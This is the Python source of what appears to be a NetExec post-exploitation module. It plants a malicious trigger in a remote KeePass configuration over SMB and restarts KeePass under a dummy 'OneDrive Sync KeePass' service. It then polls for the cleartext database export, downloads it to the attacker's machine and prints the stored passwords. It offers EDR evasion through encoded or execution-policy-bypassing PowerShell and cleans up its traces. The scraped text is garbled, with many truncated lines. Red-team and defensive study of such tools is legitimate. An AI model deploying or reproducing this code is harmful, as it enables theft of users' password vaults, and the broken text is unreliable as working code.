
409 lines
23 KiB

import os
import sys
import json
from xmltodict import parse
from time import sleep
from csv import reader
from base64 import b64encode
from io import BytesIO, StringIO
from xml.etree import ElementTree
from nxc.helpers.powershell import get_ps_script
class NXCModule:
Make use of KeePass' trigger system to export the database in cleartext
Module by @d3lb3, inspired by @harmj0y work
name = "keepass_trigger"
description = "Set up a malicious KeePass trigger to export the database in cleartext."
supported_protocols = ["smb"]
# while the module only executes legit powershell commands on the target (search and edit files)
# some EDR like Trend Micro flag base64-encoded powershell as malicious
# the option PSH_EXEC_METHOD can be used to avoid such execution, and will drop scripts on the target
opsec_safe = False
multiple_hosts = False
def __init__(self):
# module options
self.action = None
self.keepass_config_path = None
self.keepass_user = None
self.export_name = "export.xml"
self.export_path = "C:\\Users\\Public"
self.powershell_exec_method = "PS1"
# additional parameters
self.share = "C$"
self.remote_temp_script_path = "C:\\Windows\\Temp\\temp.ps1"
self.keepass_binary_path = "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe"
self.local_export_path = "/tmp"
self.trigger_name = "export_database"
self.poll_frequency_seconds = 5
self.dummy_service_name = "OneDrive Sync KeePass"
with open(get_ps_script("keepass_trigger_module/RemoveKeePassTrigger.ps1")) as remove_trigger_script_file:
self.remove_trigger_script_str =
with open(get_ps_script("keepass_trigger_module/AddKeePassTrigger.ps1")) as add_trigger_script_file:
self.add_trigger_script_str =
with open(get_ps_script("keepass_trigger_module/RestartKeePass.ps1")) as restart_keepass_script_file:
self.restart_keepass_script_str =
def options(self, context, module_options):
ACTION (mandatory) Performs one of the following actions, specified by the user:
ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file
CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's
specified file
RESTART restart KeePass using a Windows service (used to force trigger reload),
if multiple KeePass process are running, rely on USER option
POLL search for EXPORT_NAME file in EXPORT_PATH folder
(until found, or manually exited by the user)
CLEAN remove malicious trigger from KEEPASS_CONFIG_PATH as well as database
export files from EXPORT_PATH
ALL performs ADD, CHECK, RESTART, POLL, CLEAN actions one after the other
KEEPASS_CONFIG_PATH Path of the remote KeePass configuration file where to add a malicious trigger
(used by ADD, CHECK and CLEAN actions)
USER Targeted user running KeePass, used to restart the appropriate process
(used by RESTART action)
EXPORT_NAME Name fo the database export file, default: export.xml
EXPORT_PATH Path where to export the KeePass database in cleartext
default: C:\\Users\\Public, %APPDATA% works well too for user permissions
PSH_EXEC_METHOD Powershell execution method, may avoid detections depending on the AV/EDR in use
(while no 'malicious' command is executed):
ENCODE run scripts through encoded oneliners
PS1 run scripts through a file dropped in C:\\Windows\\Temp (default)
Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),
but they can still be easily edited in the module __init__ code if needed
if "ACTION" in module_options:
if module_options["ACTION"] not in [
]:"Unrecognized action, use --options to list available parameters")
self.action = module_options["ACTION"]
else:"Missing ACTION option, use --options to list available parameters")
if "KEEPASS_CONFIG_PATH" in module_options:
self.keepass_config_path = module_options["KEEPASS_CONFIG_PATH"]
if "USER" in module_options:
self.keepass_user = module_options["USER"]
if "EXPORT_NAME" in module_options:
self.export_name = module_options["EXPORT_NAME"]
if "EXPORT_PATH" in module_options:
self.export_path = module_options["EXPORT_PATH"]
if "PSH_EXEC_METHOD" in module_options:
if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]:"Unrecognized powershell execution method, use --options to list available parameters")
self.powershell_exec_method = module_options["PSH_EXEC_METHOD"]
def on_admin_login(self, context, connection):
if self.action == "ADD":
self.add_trigger(context, connection)
elif self.action == "CHECK":
self.check_trigger_added(context, connection)
elif self.action == "RESTART":
self.restart(context, connection)
elif self.action == "POLL":
self.poll(context, connection)
elif self.action == "CLEAN":
self.clean(context, connection)
self.restart(context, connection)
elif self.action == "ALL":
self.all_in_one(context, connection)
def add_trigger(self, context, connection):
"""Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1"""
# check if the specified KeePass configuration file exists
if self.trigger_added(context, connection):
context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping")
context.log.display(f"Adding trigger '{self.trigger_name}' to '{self.keepass_config_path}'")
# prepare the trigger addition script based on user-specified parameters (e.g: trigger name, etc)
# see data/keepass_trigger_module/AddKeePassTrigger.ps1 for the full script
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportPath", self.export_path)
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_ExportName", self.export_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name)
self.add_trigger_script_str = self.add_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path)
# add the malicious trigger to the remote KeePass configuration file
if self.powershell_exec_method == "ENCODE":
add_trigger_script_b64 = b64encode(self.add_trigger_script_str.encode("UTF-16LE")).decode("utf-8")
add_trigger_script_cmd = f"powershell.exe -e {add_trigger_script_b64}"
sleep(2) # as I noticed some delay may happen with the encoded powershell command execution
elif self.powershell_exec_method == "PS1":
self.put_file_execute_delete(context, connection, self.add_trigger_script_str)
except Exception as e:"Error while adding malicious trigger to file: {e}")
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
if self.trigger_added(context, connection):
context.log.success("Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
else:"Unknown error when adding malicious trigger to file")
def check_trigger_added(self, context, connection):
"""Check if the trigger is added to the config file XML tree"""
if self.trigger_added(context, connection):
context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
context.log.display(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
def restart(self, context, connection):
"""Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1
If multiple process belonging to different users are running simultaneously, relies on the USER option to choose which one to restart
# search for keepass processes
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
# we return the powershell command as a CSV for easier column parsing, skipping the header line
csv_reader = reader(search_keepass_process_output_csv.split("\n")[1:], delimiter=",")
# check if multiple processes belonging to different users are running (in order to choose which one to restart)
keepass_users = [process[1] for process in list(csv_reader)]
if len(keepass_users) == 0:"No running KeePass process found, aborting restart")
elif len(keepass_users) == 1: # if there is only 1 KeePass process running
# if KEEPASS_USER option is specified then we check if the user matches
if self.keepass_user and (keepass_users[0] != self.keepass_user and keepass_users[0].split("\\")[1] != self.keepass_user):"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart")
self.keepass_user = keepass_users[0]
elif len(keepass_users) > 1 and self.keepass_user:
found_user = False # we search through every KeePass process owner for the specified user
for user in keepass_users:
if user == self.keepass_user or user.split("\\")[1] == self.keepass_user:
self.keepass_user = keepass_users[0]
found_user = True
if not found_user:"Specified user {self.keepass_user} does not match any KeePass process owner, aborting restart")
else:"Multiple KeePass processes were found, please specify parameter USER to target one")
context.log.display(f"Restarting {keepass_users[0]}'s KeePass process")
# prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)
# see data/keepass_trigger_module/RestartKeePass.ps1
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassUser", self.keepass_user)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_KeePassBinaryPath", self.keepass_binary_path)
self.restart_keepass_script_str = self.restart_keepass_script_str.replace("REPLACE_ME_DummyServiceName", self.dummy_service_name)
# actually performs the restart on the remote target
if self.powershell_exec_method == "ENCODE":
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8")
restart_keepass_script_cmd = f"powershell.exe -e {restart_keepass_script_b64}"
elif self.powershell_exec_method == "PS1":
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
except Exception as e:"Error while restarting KeePass: {e}")
def poll(self, context, connection):
"""Search for the cleartext database export file in the specified export folder
(until found, or manually exited by the user)
found = False
context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient")
context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything")
# if the specified path is %APPDATA%, we need to check in every user's folder
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
poll_export_command_str = f"powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{self.export_name}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\""
export_full_path = f"'{self.export_path}\\{self.export_name}'"
poll_export_command_str = f'powershell.exe "if (Test-Path {export_full_path} -PathType leaf){{ Write-Output {export_full_path} }}"'
# we poll every X seconds until the export path is found on the remote machine
while not found:
poll_exports_command_output = connection.execute(poll_export_command_str, True)
if self.export_name not in poll_exports_command_output:
print(".", end="", flush=True)
# once a database is found, downloads it to the attackers machine
context.log.success("Found database export !")
# in case multiple exports found (may happen if several users exported the database to their APPDATA)
for count, export_path in enumerate(poll_exports_command_output.split("\r\n")):
buffer = BytesIO()
connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write)
# if multiple exports found, add a number at the end of local path to prevent override
local_full_path = self.local_export_path + "/" + self.export_name.split(".")[0] + "_" + str(count) + "." + self.export_name.split(".")[1] if count > 0 else self.local_export_path + "/" + self.export_name
# downloads the exported database
with open(local_full_path, "wb") as f:
remove_export_command_str = f"powershell.exe Remove-Item {export_path}"
connection.execute(remove_export_command_str, True)
context.log.success(f'Moved remote "{export_path}" to local "{local_full_path}"')
found = True
except Exception as e:"Error while polling export files, exiting : {e}")
def clean(self, context, connection):
"""Checks for database export + malicious trigger on the remote host, removes everything"""
# if the specified path is %APPDATA%, we need to check in every user's folder
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
poll_export_command_str = f"powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{self.export_name}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\""
export_full_path = f"'{self.export_path}\\{self.export_name}'"
poll_export_command_str = f'powershell.exe "if (Test-Path {export_full_path} -PathType leaf){{ Write-Output {export_full_path} }}"'
poll_export_command_output = connection.execute(poll_export_command_str, True)
# deletes every export found on the remote machine
if self.export_name in poll_export_command_output:
# in case multiple exports found (may happen if several users exported the database to their APPDATA)
for export_path in poll_export_command_output.split("\r\n"):
context.log.display(f"Database export found in '{export_path}', removing")
remove_export_command_str = f"powershell.exe Remove-Item {export_path}"
connection.execute(remove_export_command_str, True)
context.log.display(f"No export found in {self.export_path} , everything is cleaned")
# if the malicious trigger was not self-deleted, deletes it
if self.trigger_added(context, connection):
# prepare the trigger deletion script based on user-specified parameters (e.g: trigger name, etc)
# see data/keepass_trigger_module/RemoveKeePassTrigger.ps1
self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_KeePassXMLPath", self.keepass_config_path)
self.remove_trigger_script_str = self.remove_trigger_script_str.replace("REPLACE_ME_TriggerName", self.trigger_name)
# actually performs trigger deletion
if self.powershell_exec_method == "ENCODE":
remove_trigger_script_b64 = b64encode(self.remove_trigger_script_str.encode("UTF-16LE")).decode("utf-8")
remove_trigger_script_command_str = f"powershell.exe -e {remove_trigger_script_b64}"
connection.execute(remove_trigger_script_command_str, True)
elif self.powershell_exec_method == "PS1":
self.put_file_execute_delete(context, connection, self.remove_trigger_script_str)
except Exception as e:"Error while deleting trigger, exiting: {e}")
# check if the specified KeePass configuration file does not contain the malicious trigger anymore
if self.trigger_added(context, connection):"Unknown error while removing trigger '{self.trigger_name}', exiting")
context.log.display(f"Found trigger '{self.trigger_name}' in configuration file, removing")
context.log.success(f"No trigger '{self.trigger_name}' found in '{self.keepass_config_path}', skipping")
def all_in_one(self, context, connection):
"""Performs ADD, RESTART, POLL and CLEAN actions one after the other"""
self.add_trigger(context, connection)
self.restart(context, connection)
self.poll(context, connection)
context.log.display("Cleaning everything...")
self.clean(context, connection)
self.restart(context, connection)
context.log.display("Extracting password...")
def trigger_added(self, context, connection):
"""Check if the trigger is added to the config file XML tree (returns True/False)"""
# check if the specified KeePass configuration file exists
if not self.keepass_config_path:"No KeePass configuration file specified, exiting")
buffer = BytesIO()
connection.conn.getFile(self.share, self.keepass_config_path.split(":")[1], buffer.write)
except Exception as e:"Error while getting file '{self.keepass_config_path}', exiting: {e}")
keepass_config_xml_root = ElementTree.fromstring(buffer.getvalue())
except Exception as e:"Error while parsing file '{self.keepass_config_path}', exiting: {e}")
# check if the specified KeePass configuration file does not already contain the malicious trigger
return any(trigger.find("Name").text == self.trigger_name for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"))
def put_file_execute_delete(self, context, connection, psh_script_str):
"""Helper to upload script to a temporary folder, run then deletes it"""
script_str_io = StringIO(psh_script_str)
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1],
script_execute_cmd = f"powershell.exe -ep Bypass -F {self.remote_temp_script_path}"
connection.execute(script_execute_cmd, True)
remove_remote_temp_script_cmd = f'powershell.exe "Remove-Item "{self.remote_temp_script_path}""'
def extract_password(self, context):
xml_doc_path = os.path.abspath(self.local_export_path + "/" + self.export_name)
xml_tree = ElementTree.parse(xml_doc_path)
root = xml_tree.getroot()
to_string = ElementTree.tostring(root, encoding="UTF-8", method="xml")
xml_to_dict = parse(to_string)
dump = json.dumps(xml_to_dict)
obj = json.loads(dump)
if len(obj["KeePassFile"]["Root"]["Group"]["Entry"]):
for obj2 in obj["KeePassFile"]["Root"]["Group"]["Entry"]:
for password in obj2["String"]:
if password["Key"] == "Password":
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"]))
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]))
if len(obj["KeePassFile"]["Root"]["Group"]["Group"]):
for obj2 in obj["KeePassFile"]["Root"]["Group"]["Group"]:
for obj3 in obj2["Entry"]:
for password in obj3["String"]:
if password["Key"] == "Password":
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]["#text"]))
context.log.highlight(str(password["Key"]) + " : " + str(password["Value"]))
except KeyError: